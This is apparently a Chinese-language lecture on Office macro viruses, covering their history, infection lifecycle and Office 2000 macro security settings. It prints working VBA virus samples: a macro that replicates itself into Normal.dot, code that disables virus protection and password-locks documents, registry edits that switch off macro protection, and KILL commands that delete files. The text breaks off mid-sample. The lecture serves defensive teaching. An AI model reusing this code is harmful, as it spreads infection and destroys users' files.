第十講

宏病毒分析本講概要本講將針對宏病毒展開詳細的討論，就宏的概念，宏病毒的歷史，宏病毒原理，破化特性和應對之策進行學習。2本講目標 通過本講學習，學員應該掌握宏病毒的基本知識，了解宏病毒的機制和防護辦法。

與上一講一樣，本章旨在讓學員能深入了解宏病毒的傳播途徑和方式，以利于更加深刻的理解針對宏病毒的防御方法和措施，并非要求學員掌握編寫該類型病毒的技能。3宏允許用戶在做一些重復工作（例如打開、修改和保存文件）時提高自動化程度很多主流軟件包括MicrosoftWord,MicrosoftExcel,MicrosoftPowerPoint,Visio,和LotusAmiPro都有很強的編寫宏的功能宏4宏并不局限于同一種軟件創建的文件，別的文件類型也同樣這使得使用宏編寫一個文件傳播到另一個文件的病毒程序變得相對簡單宏5歷史簡介第一個宏病毒–LOTUS123簡單的宏語言文件的訪問是通過菜單條第一個真正的宏病毒–DMV(DocumentMacroVirus)December,1994JoelMcNamara是為了示范宏病毒的可能性而編寫的第一個傳播的宏病毒–WM/ConceptSummer,19956各種平臺以及軟件MicrosoftOfficeWinWordExcelPowerPointAccessAmiProCorelDrawPCMacintoshDECAlphaWindowsMacOSSoftWindows7SoftWindows988VBA3,VBA5,VBA6&Excel宏語言Formula–Excel4.0VBA3–Excel5.0WordBasic–Word6.0VBA5–Office97applicationsVBA6–Office2000注

從WinWord7.0a–1st

以后，微軟的程序開始自帶防病毒的警告機制9VisualBasicforApplicationsJanuary1997微軟發布Office97(所有的程序都采用VBA5)Word8.0可以轉化（重編碼）以前的宏到新的語言版本轉化的成功率–90%自動刪除常見的宏病毒以阻止它們的傳播WM/Concept.A,WM/Wazzu.A

和WM/Npad.A比WordBasic擁有更復雜的語言在OLE2文件中，宏用兩種不同的實體方式存在編譯過的宏語言體壓縮過的宏文本10MainTitle,

60pt.,U/Lcase

LS=.8linesOFFICE中的宏11查看宏VisualBasic編輯器注：調用VB編輯器的快捷方式：Alt-F11查看宏代碼可以點擊Tools>Macro>VisualBasicEditor12禁用宏打開時針對Office95and97針對Office200013禁用宏打開宏病毒防護功能(Office97)單擊Tools>Options在Options

對話框，選中Macrovirusprotection14禁用宏打開宏病毒防護功能(Office2000)單擊Tools>Macro>Security在Security

對話框中，選擇

High或Medium15調試VBA設置斷點斷點會在被設置的位置中斷程序代碼的執行點擊代碼窗口左側灰色空白處以設置斷點.斷點會被高亮顯示出來，并且左邊有一個紅點顯示16調試VBA變量的值為了查看一個變量的值，指向該變量（在調試模式下）該變量的值會自動顯示出來17MSWord宏病毒Word病毒感染通用模板，該文件的名字為NORMAL.DOT.

該文件維護缺省的和用戶自定義的關于MS-Word的設置該文件的修改會影響所有后來用word打開的文件18WORD宏病毒的生命周期某個宏病毒對文檔取得控制權該病毒將自身復制到通用模板通用模板在啟動時自動調用某些受感染文件會直接查找硬盤上的相關文件有時會使用最近打開的文件列表其它的會把自己復制到模板文件中去（類似通用模板）19MicrosoftExcel病毒這些病毒在執行的時候會將自身復制到其它的Excel文件中去，同時在Excel的啟動文件夾中也會留下一份拷貝MSExcel在啟動的時候會自動加載在這個文件夾中的所有文件20EXCEL宏病毒的生命周期Excel病毒在啟動文件夾XLSTART中生成一個新的啟動文件Excel在下次運行時加載該文件(PERSONAL.XLS)Excel不檢查文件的后綴名，因此許多病毒遺留下來的文件就不添加后綴名，比如‘BOOK1’21MicrosoftOfficeAutoMacros這些宏的自動執行的特點使得病毒的編寫成為可能一個自動執行的宏語句是指在滿足某個特定的條件下會自動執行，并不需要用戶顯式的執行22AutoMacro范例MicrosoftWordAutoOpen

AutoClose

AutoExec

AutoExit

AutoNewMicrosoftExcelAuto_OpenAuto_CloseAuto_ActivateAuto_Deactivate23菜單關聯/快捷鍵將宏和菜單欄的某個選項相關聯刪除和修改菜單欄中的項目將宏和鍵盤上的某個鍵相關聯這些方法可以取代使用auto-macros的方法取得控制權24多態宏病毒舉例W97M/CLASS.A&W97M/STP利用WinWord的編輯功能修改自身的代碼25隱形和加密病毒代碼防止被輕易查看到的措施26隱形和加密：續27隱形和加密：續宏病毒存儲時代碼隨機打亂28口令保護WinWord6.0/7.0整個文件可以進行密碼保護整個文件被打亂不能訪問該文件和其中的宏Office97/2000在文檔用密碼進行保護后，宏語句還是可以被查看到29文件損壞和手動編輯WinWord6.0在宏語句進行復制的時候有一個程序的錯誤這會導致WM/NPAD200個不同的變種1997/98-自然的損壞是病毒主要來源Office97可以用VBE進行編輯(ALT+F11)用戶手動編輯出來的宏是病毒的主要來源30其它手動刪除某些外來的宏語句防病毒產品沒有完全將宏病毒正確清除WinWord在復制宏語句時異常終止由于Word6.0的其它原因生成的不正常的宏語句VBA5/VBA6在單一模組中允許多項功能和多個事件操作同時進行Office97/2000–很少有其它情形下產生的宏病毒31混合不同的宏病毒存在在一個用戶系統中從其它的宏病毒中”借鑒”從通用模板中的宏語句獲取相應的信息相同的病毒往往處在同一類型的模組中,稱為‘ThisDocument’或‘ThisWorkbook’32病毒代碼SubAutoClose()OnErrorResumeNextApplication.VBE.ActiveVBProject.VBComponents("demo").Export"c:\demo.sys"ForI=1ToNormalTemplate.VBProject.VBComponents.CountIfNormalTemplate.VBProject.VBComponents(I).Name="demo"Then

NormInstall=TrueNextIForI=1ToActiveDocument.VBProject.VBComponents.CountIfActiveDocument.VBProject.VBComponents(I).Name="demo"Then

ActivInstall=TrueNextIIfActivInstall=TrueAndNormInstall=FalseThen SetDobj=NormalTemplate.VBProject

ElseIfActivInstall=FalseAndNormInstall=TrueThen SetDobj=ActiveDocument.VBProjectDobj.VBComponents.Import("c:\demo.sys")EndSub33運行邏輯導出到C:\DEMO.SYS(病毒源代碼)檢查是否已經安裝在NORMAL.DOT-如果是的話,設置變量

檢查是否已經安裝在活動文件中–如果是的話設置變量如果在NORMAL.DOT中沒有的話將C:\DEMO.SYS導入如果在活動文件中沒有的話將C:\DEMO.SYS導入34代碼分析

SubAutoClose()當文件關閉時會自動啟用OnErrorResumeNext如果出錯,就接下去執行下面的指示ForI=1ToNormalTemplate.VBProject.VBComponents.Count在normal.dot

中根據模組中的數目重復執行下面的代碼35代碼分析：續

IfNormalTemplate.VBProject.VBComponents(I).Name="demo"ThenNormInstall=True如果在normal.dot中有名為“demo”的模組，將NormInstall的變量值置為１（true）NextI重復執行一遍ForI=1ToActiveDocument.VBProject.VBComponents.Count根據活動文件中模組的數目重復執行下面的代碼36代碼分析：續

IfActiveDocument.VBProject.VBComponents(I).Name="demo"ThenActivInstall=True如果在活動文件中有名為“demo”的模組，將ActivInstall的變量值置為１（true）NextI重復執行一次IfActivInstall=TrueAndNormInstall=FalseThenSetDobj=NormalTemplate.VBProject如果在當前文檔中安裝完畢，但在normal.dot中沒有的話，導入到normal.dot文檔中37代碼分析：續

ElseIfActivInstall=FalseAndNormInstall=TrueThenSetDobj=ActiveDocument.VBProject另外，如果已經安裝在normal.dot中而在當前文檔中沒有的話，導入到當前文檔中

Dobj.VBComponents.Import("c:\demo.sys")這將會把c:\demo.sys導入到normal.dot或者活動文檔，根據上面設置的變量值決定SetDobj=ActiveDocument.VBProject這樣的話，我們只需參考Dobj.VBComponents.Import("c:\demo.sys")`38提示!!!39MainTitle,

60pt.,U/Lcase

LS=.8linesOffice2000和宏的安全性40新特性數字簽名安全級別信任源插件和模板防病毒的專用接口Office97的弱點注冊表的安全設置41數字簽名Office2000(Word/Excel/PowerPoint)現在支持數字簽名的VBA宏Access2000不支持數字簽名數字簽名只被應用到VBA項目的內容文本內容的變化不影響數字簽名添加新的宏語句會導致數字簽名失效42數字簽名43安全級別低安全級別中等安全級別高安全級別44低安全級別沒有安全保障宏會完全執行，沒有任何警告提示45中等安全級別需要征求用戶的意見是否執行宏語句有數字簽名的宏會被啟用46高安全級別禁用沒有簽名的宏（不會有警告提示）有數字簽名的宏可以被禁止或添加到信任列表中去47默認的安全級別Word2000高安全級別Excel2000&PowerPoint2000中等安全級別Access2000不支持48信任源這是在高安全級別時啟用宏的唯一方法添加一個發行者意味著所有該發行者提供的宏都會被自動啟用這份列表會被所有的Office程序所共享49信任源50插件和模板對待安裝的插件和模板的方法是和普通文檔一樣的默認情況下，該選項是被禁止的51防毒軟件接口在文件被打開之前，調用注冊過的掃描器來掃描該文件52Office97的弱點Word97模板的安全補丁Word97&右鍵快捷打印Excel97調用功能的補丁53Word97模板的安全補丁歷史針對包含帶宏的模板的文檔，Word97打開這種文檔中包含的宏時并不進行任何提示糾正措施安全級別保護和宏掃描應用于附加的模板54Word97&右鍵快捷打印歷史當文件在使用右鍵快捷打印功能時，關于宏病毒的防護功能并沒有被啟用糾正措施安全級別保護和宏掃描應用于右鍵快捷打印55Excel97調用功能的補丁歷史Excel工作簿可以調用動態鏈接庫針對這種情況的宏，保護措施并沒有給出預警糾正措施將工作簿的調用功能禁止56注冊表的安全設置關于安全設置的注冊表位置HKEY_CURRENT_USER\Software\Microsoft\Office\NN.0\Word\Security57Office2000白皮書HTTP://OFFICE.MICROSOFT.COM/DOWNLOADS/2000/O2KSEC.ASPX58推薦的設置將所有的Office2000程序的安全級別設置為高禁用‘Trustallinstalledadd-insandtemplates’選項將Excel4.0-類型的宏轉化為VBA將所有的宏簽名，包括插件和模板在注冊表中的鍵值設置并鎖定為高安全級別使用防毒軟件進行對所有使用的文件進行掃描59Office宏病毒的某些癥狀文件的大小增加了

工具欄上的菜單條被改動過打開一個文件時，CPU利用率變的很高無法打開最近使用過的一些文檔60建議的清除措施使用專業的防毒軟件進行對宏病毒的自動清除61MainTitle,

60pt.,U/Lcase

LS=.8lines宏病毒的代碼示范62SubAutoOpen()Options.VirusProtection=FalseOptions.ConfirmConversions=FalseOptions.SaveNormalPrompt=FalseIfDay(Now)=Hour(Now)ThenSetFunnyShit=ActiveDocumentFunnyShit.Password="ZeRg1.0"ActiveDocument.SaveEndIf與自動執行的宏關聯舉例:W97M_ZERG.AVirusCode63SYSTEM.PRIVATEPROFILESTRING("","HKEY_CURRENT_USER\SOFTWARE\MICROSOFT\OFFICE\8.0\POWERPOINT\OPTIONS","MACROVIRUSPROTECTION")="“SYSTEM.PRIVATEPROFILESTRING("","HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\OFFICE\8.0\NEWUSERSETTINGS\POWERPOINT\OPTIONS","MACROVIRUSPROTECTION")="“SYSTEM.PRIVATEPROFILESTRING("","HKEY_USERS\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\8.0\POWERPOINT\OPTIONS","MACROVIRUSPROTECTION")=""注冊表修改舉例:WM_TRISTATE64KILL"C:\*.*"KILL"C:\MYDOCUMENTS\*.*"KILL"C:\WIN